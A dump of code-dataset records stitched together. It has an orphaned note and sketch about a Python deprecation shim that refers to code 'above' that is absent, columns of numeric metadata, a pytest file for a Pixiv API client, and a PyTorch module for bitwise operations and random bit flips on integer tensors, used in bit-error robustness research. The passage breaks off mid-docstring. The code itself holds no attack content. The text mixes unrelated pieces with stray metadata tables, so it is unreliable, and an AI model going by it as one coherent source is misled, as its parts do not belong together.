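This three-line module is a relocation shim: it warns on import, then re-exports the symbol from its new home so legacy imports keep working. The bare `warn()` above defaults to `UserWarning`; a minimal sketch of the same pattern with an explicit category and `stacklevel`, using hypothetical module names:

# oldpkg/daemonize.py (hypothetical relocation shim)
import warnings

warnings.warn(
    "oldpkg.daemonize has moved to newpkg.daemonize",
    DeprecationWarning,
    stacklevel=2,  # point the warning at the importer, not at this shim
)
from newpkg.daemonize import daemonize  # noqa: E402,F401 -- re-export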
| 30.4
| 72
| 0.815789
| 20
| 152
| 6.2
| 0.6
| 0.241935
| 0.387097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118421
| 152
| 4
| 73
| 38
| 0.925373
| 0
| 0
| 0
| 0
| 0
| 0.425676
| 0.331081
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1839f4bc2b36070a1be6575913046e417b10ee8b
| 896
|
py
|
Python
|
tests/test_user.py
|
SaidBySolo/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 4
|
2021-02-19T07:07:47.000Z
|
2021-07-30T13:25:29.000Z
|
tests/test_user.py
|
Saebasol/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 1
|
2021-07-30T04:52:12.000Z
|
2021-08-01T16:51:42.000Z
|
tests/test_user.py
|
SaidBySolo/pypixiv
|
b8a99c0ee0f683478e9c25c9f3c6aa78e0e9c0b6
|
[
"MIT"
] | 1
|
2021-07-30T15:42:59.000Z
|
2021-07-30T15:42:59.000Z
|
import pytest
from pypixiv.client import PixivClient
from tests.util import filter_magicmethod
@pytest.mark.asyncio
async def test_userinfo(client: PixivClient):
user = await client.userinfo(9666585)
property_names = filter_magicmethod(user)
for i in property_names:
getted = getattr(i["obj"], i["name"])
if not type(getted).__module__ in ["__builtin__", "builtins"]:
if son := filter_magicmethod(getted):
property_names.extend(son)
@pytest.mark.asyncio
async def test_full_userinfo(client: PixivClient):
user = await client.userinfo(9666585)
property_names = filter_magicmethod(user)
for i in property_names:
getted = getattr(i["obj"], i["name"])
if not type(getted).__module__ in ["__builtin__", "builtins"]:
if son := filter_magicmethod(getted):
property_names.extend(son)
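`tests.util.filter_magicmethod` is not shown here, but the tests consume it as a list of `{"obj": ..., "name": ...}` dicts covering the non-dunder attributes of a response object, extending that list as they walk nested models. A plausible reconstruction, offered only as a hypothetical sketch:

def filter_magicmethod(obj):
    # Collect every attribute that is not a magic/dunder name, in the
    # {"obj": ..., "name": ...} shape the tests above iterate over.
    return [
        {"obj": obj, "name": name}
        for name in dir(obj)
        if not name.startswith("__")
    ]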
| 29.866667
| 70
| 0.680804
| 108
| 896
| 5.37037
| 0.342593
| 0.134483
| 0.058621
| 0.075862
| 0.851724
| 0.851724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0
| 0.019886
| 0.214286
| 896
| 29
| 71
| 30.896552
| 0.803977
| 0
| 0
| 0.761905
| 0
| 0
| 0.058036
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
184b02f9bd3b5201e8602d3b629ae81251a25e16
| 51,458
|
py
|
Python
|
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
common/torch/bitwise.py
|
davidstutz/random-bit-error-robustness
|
59d8533c8db87ba1b220a64032cf929e5d67fbfa
|
[
"Unlicense"
] | null | null | null |
"""
Bitwise tensor manipulation.
"""
import torch
import math
import common.cffi as cffi
import common.cupy as cupy
from .utils import is_cuda, topk
def check_type(*tensors):
def check_precision(tensor):
if tensor.dtype == torch.int32:
return 32
elif tensor.dtype == torch.int16:
return 16
elif tensor.dtype == torch.int8:
return 8
elif tensor.dtype == torch.uint8:
return 8
else:
raise NotImplementedError
precision = None
for tensor in tensors:
assert (tensor.dtype == torch.int32) or (tensor.dtype == torch.int16) or (tensor.dtype == torch.int8) or (tensor.dtype == torch.uint8)
if precision is None:
precision = check_precision(tensor)
else:
assert precision == check_precision(tensor), 'tensor should be %d-bit, but is %d-bit' % (precision, check_precision(tensor))
return precision
def int_bitwise_operation(a, b, name):
"""
Bit-wise operation between integer tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: second tensor
:type b: torch.Tensor
:param name: name of cupy kernel
:type name: str
:return: result of the bit-wise operation
:rtype: torch.Tensor
"""
#assert (a.is_contiguous() == True)
if not a.is_contiguous():
a = a.contiguous()
if not b.is_contiguous():
b = b.contiguous()
check_type(a, b)
cuda = is_cuda(a)
assert is_cuda(b) is cuda
assert len(a.shape) == len(b.shape), (a.shape, b.shape)
for d in range(len(a.shape)):
assert a.shape[d] == b.shape[d], (a.shape, b.shape, d)
c = a.new_zeros(a.shape)
n = c.nelement()
shape = list(c.shape)
grid, block = cupy.grid_block(shape)
type = str(a.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%s%s' % (type, name))(
grid=tuple(grid),
block=tuple(block),
args=[n,
a.data_ptr(),
b.data_ptr(),
c.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
if name == 'and':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32and(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
cffi.lib.cffi_int16and(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8and(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8and(_n, _a, _b, _c)
else:
raise NotImplementedError
elif name == 'or':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32or(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
cffi.lib.cffi_int16or(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8or(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8or(_n, _a, _b, _c)
else:
raise NotImplementedError
elif name == 'xor':
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
_c = cffi.ffi.cast('int*', c.data_ptr())
cffi.lib.cffi_int32xor(_n, _a, _b, _c)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
_c = cffi.ffi.cast('short*', c.data_ptr())
cffi.lib.cffi_int16xor(_n, _a, _b, _c)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
_c = cffi.ffi.cast('char*', c.data_ptr())
cffi.lib.cffi_int8xor(_n, _a, _b, _c)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
_c = cffi.ffi.cast('unsigned char*', c.data_ptr())
cffi.lib.cffi_uint8xor(_n, _a, _b, _c)
else:
raise NotImplementedError
else:
raise NotImplementedError()
return c
def int_and(a, b):
"""
Bit-wise and between integer tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: second tensor
:type b: torch.Tensor
:return: bit-wise and
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'and')
def int_or(a, b):
"""
Bit-wise or between integer tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: second tensor
:type b: torch.Tensor
:return: bit-wise or
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'or')
def int_xor(a, b):
"""
Bit-wise xor between integer tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: second tensor
:type b: torch.Tensor
:return: bit-wise xor
:rtype: torch.Tensor
"""
return int_bitwise_operation(a, b, 'xor')
def int_msb_projection(original, perturbed):
"""
Most-significant-bit (MSB) projection of a perturbed integer tensor onto the original.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:return: msb projection of perturbed onto original
:rtype: torch.Tensor
"""
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(perturbed.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
output = torch.zeros_like(original)
n = original.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(original.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%smsbprojection' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
original.data_ptr(),
perturbed.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
if type == 'int32':
_original = cffi.ffi.cast('int*', original.data_ptr())
_perturbed = cffi.ffi.cast('int*', perturbed.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32msbprojection(_n, _original, _perturbed, _output)
elif type == 'int16':
_original = cffi.ffi.cast('short*', original.data_ptr())
_perturbed = cffi.ffi.cast('short*', perturbed.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16msbprojection(_n, _original, _perturbed, _output)
elif type == 'int8':
_original = cffi.ffi.cast('char*', original.data_ptr())
_perturbed = cffi.ffi.cast('char*', perturbed.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8msbprojection(_n, _original, _perturbed, _output)
elif type == 'uint8':
_original = cffi.ffi.cast('unsigned char*', original.data_ptr())
_perturbed = cffi.ffi.cast('unsigned char*', perturbed.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8msbprojection(_n, _original, _perturbed, _output)
else:
raise NotImplementedError
return output
def int_hamming_projection(original, perturbed, epsilon, method='topk'):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:param method: method to use
:type method: str
:return: hamming projection of perturbed onto original
:rtype: torch.Tensor
"""
if method == 'sort':
return int_hamming_projection_sort(original, perturbed, epsilon)
elif method == 'topk':
return int_hamming_projection_topk(original, perturbed, epsilon)
else:
raise NotImplementedError
def int_hamming_projection_topk(original, perturbed, epsilon):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:return: hamming projection of perturbed onto original
:rtype: torch.Tensor
"""
# assert epsilon >= 0
# https://stackoverflow.com/questions/51433741/rearranging-a-3-d-array-using-indices-from-sorting
# size = list(tensor.shape)
# sorted, indices = torch.sort(tensor.view(tensor.size()[0], -1), dim=1, descending=True)
# k = int(math.ceil(epsilon))
# assert k > 0
# sorted[:, min(k, sorted.size(1) - 1):] = 0
# print(sorted)
# tensor = tensor.scatter_(dim=1, index=indices, src=sorted)
# tensor = tensor.view(size)
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(perturbed.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
size = original.shape
original = original.view(-1)
perturbed = perturbed.view(-1)
assert epsilon >= 0, epsilon
perturbed_float = torch.clone(perturbed).float()
original_float = torch.clone(original).float()
difference = torch.abs(perturbed_float - original_float)
k = int(math.ceil(epsilon))
k = min(k, difference.size(0) - 1)
assert k > 0, k
_, top_indices = topk(difference, k=k)
projection_top_original = original[top_indices]
projection_top_perturbed = perturbed[top_indices]
projection_top_projected = int_msb_projection(projection_top_original, projection_top_perturbed)
#projection_top_projected = projection_top_perturbed
projected = torch.clone(original)
projected[top_indices] = projection_top_projected
return projected.view(size)
def int_hamming_projection_sort(original, perturbed, epsilon):
"""
Hamming projection with an additional hamming constraint of 1 per word.
:param original: original tensor
:type original: torch.Tensor
:param perturbed: perturbed tensor
:type perturbed: torch.Tensor
:param epsilon: epsilon
:type epsilon: int
:return: hamming projection of perturbed onto original
:rtype: torch.Tensor
"""
# assert epsilon >= 0
# https://stackoverflow.com/questions/51433741/rearranging-a-3-d-array-using-indices-from-sorting
# size = list(tensor.shape)
# sorted, indices = torch.sort(tensor.view(tensor.size()[0], -1), dim=1, descending=True)
# k = int(math.ceil(epsilon))
# assert k > 0
# sorted[:, min(k, sorted.size(1) - 1):] = 0
# print(sorted)
# tensor = tensor.scatter_(dim=1, index=indices, src=sorted)
# tensor = tensor.view(size)
if not original.is_contiguous():
original = original.contiguous()
if not perturbed.is_contiguous():
perturbed = perturbed.contiguous()
check_type(original, perturbed)
cuda = is_cuda(original)
assert is_cuda(perturbed) is cuda
assert len(original.shape) == len(perturbed.shape), (original.shape, perturbed.shape)
for d in range(len(original.shape)):
assert original.shape[d] == perturbed.shape[d], (original.shape, perturbed.shape, d)
size = original.shape
original = original.view(-1)
perturbed = perturbed.view(-1)
assert epsilon >= 0, epsilon
difference = torch.abs(perturbed - original)
sorted_difference, sorted_indices = torch.sort(difference, descending=True)
sorted_original = torch.gather(original, dim=0, index=sorted_indices)
# will hold the projection later
sorted_projected = torch.gather(perturbed, dim=0, index=sorted_indices)
# print(original)
# print(perturbed)
# print(difference)
# print(sorted_original)
# print(sorted_projected)
# print(sorted_difference)
k = int(math.ceil(epsilon))
k = min(k, sorted_difference.size(0) - 1)
assert k > 0, k
projection_sorted_original = sorted_original[:k]
projection_sorted_perturbed = sorted_projected[:k]
projection_sorted_projected = int_msb_projection(projection_sorted_original, projection_sorted_perturbed)
sorted_projected[:k] = projection_sorted_projected
sorted_projected[k:] = sorted_original[k:]
# sorted_projected[k:] = 0
# print('---')
# print(sorted_projected)
# projected = torch.zeros_like(sorted_projected).scatter_(dim=0, index=sorted_indices, src=sorted_projected)
projected = torch.scatter(sorted_projected, dim=0, index=sorted_indices, src=sorted_projected)
# print(projected)
return projected.view(size)
def int_hamming_distance(a, b):
"""
Per-element Hamming distance between integer tensors.
:param a: first tensor
:type a: torch.Tensor
:param b: second tensor
:type b: torch.Tensor
:return: per-element hamming distance
:rtype: torch.Tensor
"""
if not a.is_contiguous():
a = a.contiguous()
if not b.is_contiguous():
b = b.contiguous()
check_type(a, b)
cuda = is_cuda(a)
assert is_cuda(b) is cuda
assert len(a.shape) == len(b.shape), (a.shape, b.shape)
for d in range(len(a.shape)):
assert a.shape[d] == b.shape[d], (a.shape, b.shape, d)
if cuda:
dist = torch.cuda.IntTensor(a.shape).fill_(0)
else:
dist = torch.IntTensor(a.shape).fill_(0)
n = a.nelement()
shape = list(dist.shape)
grid, block = cupy.grid_block(shape)
type = str(a.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%shammingdistance' % type)(
grid=tuple(grid),
block=tuple(block),
args=[n,
a.data_ptr(),
b.data_ptr(),
dist.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_dist = cffi.ffi.cast('int*', dist.data_ptr())
if type == 'int32':
_a = cffi.ffi.cast('int*', a.data_ptr())
_b = cffi.ffi.cast('int*', b.data_ptr())
cffi.lib.cffi_int32hammingdistance(_n, _a, _b, _dist)
elif type == 'int16':
_a = cffi.ffi.cast('short*', a.data_ptr())
_b = cffi.ffi.cast('short*', b.data_ptr())
cffi.lib.cffi_int16hammingdistance(_n, _a, _b, _dist)
elif type == 'int8':
_a = cffi.ffi.cast('char*', a.data_ptr())
_b = cffi.ffi.cast('char*', b.data_ptr())
cffi.lib.cffi_int8hammingdistance(_n, _a, _b, _dist)
elif type == 'uint8':
_a = cffi.ffi.cast('unsigned char*', a.data_ptr())
_b = cffi.ffi.cast('unsigned char*', b.data_ptr())
cffi.lib.cffi_uint8hammingdistance(_n, _a, _b, _dist)
else:
raise NotImplementedError
return dist
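# For reference, the per-element semantics of the kernels above can be written
# in pure Python: the Hamming distance of two words is the popcount of their
# XOR. A minimal sketch (illustrative, not the fast path), masking to the word
# width so negative Python ints behave like two's-complement words:
def _hamming_distance_reference(a, b, bits=32):
    mask = (1 << bits) - 1
    return bin((a ^ b) & mask).count('1')
# e.g. _hamming_distance_reference(0b1010, 0b0110) == 2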
# 0.5^9
INT32_FAST_RANDOM_FLIP_0001953125 = '&&&&&&&&'
# 0.5^8 * 0.75
INT32_FAST_RANDOM_FLIP_0002929688 = '|&&&&&&&&'
# 0.5^8
INT32_FAST_RANDOM_FLIP_000390625 = '&&&&&&&'
# 0.5^7 * 0.75
INT32_FAST_RANDOM_FLIP_0005859375 = '|&&&&&&&'
# 0.5^7
INT32_FAST_RANDOM_FLIP_00078125 = '&&&&&&'
# 0.5^6 * 0.75
INT32_FAST_RANDOM_FLIP_001171875 = '|&&&&&&'
# 0.5^6
INT32_FAST_RANDOM_FLIP_0015625 = '&&&&&'
# 0.5^5 * 0.75
INT32_FAST_RANDOM_FLIP_00234375 = '|&&&&&'
# 0.5^5
INT32_FAST_RANDOM_FLIP_003125 = '&&&&'
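# The pattern strings above encode the per-bit probability that the generated
# mask is 1: starting from one uniformly random word (p = 0.5), each '&' with a
# fresh random word halves p, and each '|' moves p halfway towards 1. A small
# hypothetical helper (not used by the module) makes the mapping explicit:
def _pattern_probability(pattern):
    p = 0.5
    for op in pattern:
        if op == '&':
            p *= 0.5
        elif op == '|':
            p = 0.5 + 0.5 * p
    return p
# e.g. _pattern_probability(INT32_FAST_RANDOM_FLIP_001171875) == 0.01171875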
def int_fast_random_flip(input, prob=INT32_FAST_RANDOM_FLIP_001171875, protected_bits=[0]*32):
"""
    Fast version of random int32 bit flips supporting only specific flip probabilities.
    Inspired by https://stackoverflow.com/questions/35795110/fast-way-to-generate-pseudo-random-bits-with-a-given-probability-of-0-or-1-for-e/35811904#35811904.
    Protected bits are enforced by converting protected_bits to an int mask and ANDing it with
    the random mask before applying XOR for the bit flips.
    Important: slightly underestimates the flip probabilities!

    :param input: input tensor
    :type input: torch.Tensor
    :param prob: flip pattern, one of the INT32_FAST_RANDOM_FLIP_* constants encoding the per-bit flip probability
    :type prob: str
    :param protected_bits: list of length 32, indicating whether a bit is protected (1) or may be flipped (0)
    :type protected_bits: [int]
    :return: input with random bit flips
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
assert (input.dtype == torch.int32)
assert prob in [
INT32_FAST_RANDOM_FLIP_0001953125,
INT32_FAST_RANDOM_FLIP_0002929688,
INT32_FAST_RANDOM_FLIP_000390625,
INT32_FAST_RANDOM_FLIP_0005859375,
INT32_FAST_RANDOM_FLIP_00078125,
INT32_FAST_RANDOM_FLIP_001171875,
INT32_FAST_RANDOM_FLIP_0015625,
INT32_FAST_RANDOM_FLIP_00234375,
INT32_FAST_RANDOM_FLIP_003125,
]
def generator(pattern, size, cuda=False):
if cuda:
r = torch.cuda.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
else:
r = torch.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
for i in range(len(pattern)):
if cuda:
a = torch.cuda.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
else:
a = torch.IntTensor(*size).random_(torch.iinfo(torch.int32).min, torch.iinfo(torch.int32).max)
if pattern[i] == '&':
r = int_and(r, a)
elif pattern[i] == '|':
r = int_or(r, a)
return r
bits = ''
for protected_bit in protected_bits:
if protected_bit == 1:
bits += '0'
else:
bits += '1'
protected = int(bits, 2)
size = list(input.shape)
protected = torch.ones(size, dtype=torch.int32)*protected
if is_cuda(input):
protected = protected.cuda()
random = generator(prob, size, cuda=is_cuda(input))
random = int_and(random, protected)
output = int_xor(input, random)
return output
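# Hedged usage sketch (illustrative only): flip roughly 0.3% of all bits of a
# random int32 tensor, protecting no bits; int_and/int_or/int_xor come from
# earlier in this module and require the compiled extensions.
def _demo_int_fast_random_flip():
    weights = torch.randint(-2**31, 2**31 - 1, (64, 64), dtype=torch.int32)
    flipped = int_fast_random_flip(weights, prob=INT32_FAST_RANDOM_FLIP_003125)
    changed = (weights != flipped).float().mean().item()
    return changed  # expected to be close to 1 - (1 - 0.003125)**32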
def int_flip(input, mask, precision=None):
"""
    Flip bits in input according to mask.

    :param input: input tensor
    :type input: torch.Tensor
    :param mask: boolean mask of shape input.shape + [precision]
    :type mask: torch.Tensor
    :return: input with the masked bits flipped
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not mask.is_contiguous():
mask = mask.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert (mask.dtype == torch.bool)
assert is_cuda(mask) is cuda
assert len(input.shape) + 1 == len(mask.shape), (input.shape, mask.shape)
for d in range(len(input.shape)):
assert input.shape[d] == mask.shape[d], (input.shape, mask.shape, d)
assert mask.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sflip' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
mask.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_mask = cffi.ffi.cast('bool*', mask.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32flip(_n, _mask, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16flip(_n, _mask, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8flip(_n, _mask, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8flip(_n, _mask, _input, _output)
else:
raise NotImplementedError
return output
def int_set_zero(input, m, precision=None):
"""
Set the m LSBs to zero.
:param input: input tensor
:type input: torch.Tensor
:param m: number of LSBs
:type m: int
    :return: input with the m LSBs set to zero
:rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert m <= precision
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%ssetzero' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
m,
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
        # m is a plain Python int and is passed by value like n; casting it to
        # 'int*' would misinterpret the value as a pointer address
        _m = cffi.ffi.cast('int', m)
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32setzero(_n, _m, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16setzero(_n, _m, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8setzero(_n, _m, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8setzero(_n, _m, _input, _output)
else:
raise NotImplementedError
return output
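# For intuition, clearing the m LSBs of a word is equivalent to ANDing with a
# mask whose low m bits are zero. A plain-Python reference (illustrative only;
# the kernels above do this element-wise on tensors):
def _set_zero_reference(x, m, bits=32):
    mask = ((1 << bits) - 1) & ~((1 << m) - 1)
    return x & mask
# e.g. _set_zero_reference(0b10111, 3) == 0b10000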
def int_set(input, set1, set0, precision=None):
"""
    Set bits in input according to the set1 and set0 masks.

    :param input: input tensor
    :type input: torch.Tensor
    :param set1: boolean mask of bits to set to 1
    :type set1: torch.Tensor
    :param set0: boolean mask of bits to set to 0
    :type set0: torch.Tensor
    :return: input with the masked bits set accordingly
    :rtype: torch.Tensor
"""
if not input.is_contiguous():
input = input.contiguous()
if not set1.is_contiguous():
set1 = set1.contiguous()
if not set0.is_contiguous():
set0 = set0.contiguous()
inferred_precision = check_type(input)
if precision is None:
precision = inferred_precision
cuda = is_cuda(input)
assert (set1.dtype == torch.bool)
assert is_cuda(set1) is cuda
assert (set0.dtype == torch.bool)
assert is_cuda(set0) is cuda
assert len(input.shape) + 1 == len(set1.shape), (input.shape, set1.shape)
assert len(input.shape) + 1 == len(set0.shape), (input.shape, set0.shape)
for d in range(len(input.shape)):
assert input.shape[d] == set1.shape[d], (input.shape, set1.shape, d)
assert input.shape[d] == set0.shape[d], (input.shape, set0.shape, d)
assert set1.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
assert set0.shape[-1] == precision, 'precision does not match, using inferred precision: %s' % (inferred_precision == precision)
output = input.new_zeros(input.shape)
n = output.nelement()
shape = list(output.shape)
grid, block = cupy.grid_block(shape)
type = str(input.dtype).replace('torch.', '')
if cuda:
cupy.cunnex('cupy_%sset' % type)(
# https://stackoverflow.com/questions/9985912/how-do-i-choose-grid-and-block-dimensions-for-cuda-kernels
grid=tuple(grid),
block=tuple(block),
args=[n,
set1.data_ptr(),
set0.data_ptr(),
input.data_ptr(),
output.data_ptr()],
stream=cupy.Stream
)
else:
_n = cffi.ffi.cast('int', n)
_set1 = cffi.ffi.cast('bool*', set1.data_ptr())
_set0 = cffi.ffi.cast('bool*', set0.data_ptr())
if type == 'int32':
_input = cffi.ffi.cast('int*', input.data_ptr())
_output = cffi.ffi.cast('int*', output.data_ptr())
cffi.lib.cffi_int32set(_n, _set1, _set0, _input, _output)
elif type == 'int16':
_input = cffi.ffi.cast('short*', input.data_ptr())
_output = cffi.ffi.cast('short*', output.data_ptr())
cffi.lib.cffi_int16set(_n, _set1, _set0, _input, _output)
elif type == 'int8':
_input = cffi.ffi.cast('char*', input.data_ptr())
_output = cffi.ffi.cast('char*', output.data_ptr())
cffi.lib.cffi_int8set(_n, _set1, _set0, _input, _output)
elif type == 'uint8':
_input = cffi.ffi.cast('unsigned char*', input.data_ptr())
_output = cffi.ffi.cast('unsigned char*', output.data_ptr())
cffi.lib.cffi_uint8set(_n, _set1, _set0, _input, _output)
else:
raise NotImplementedError
return output
def int_random_flip(input, zero_prob=0.1, one_prob=0.1, protected_bits=[0]*32, rand=None, precision=None):
"""
    Randomly flip bits in an integer tensor with the given probabilities for flipping zeros and ones.
    Note that for zero and one probabilities of 0.1, roughly a fraction of 0.075 of the values actually
    changes, compared to roughly 0.092 for the cupy version.

    :param input: input tensor
    :type input: torch.Tensor
    :param rand: optional tensor holding a random value per bit, shape is input.shape + [precision]
    :type rand: torch.Tensor
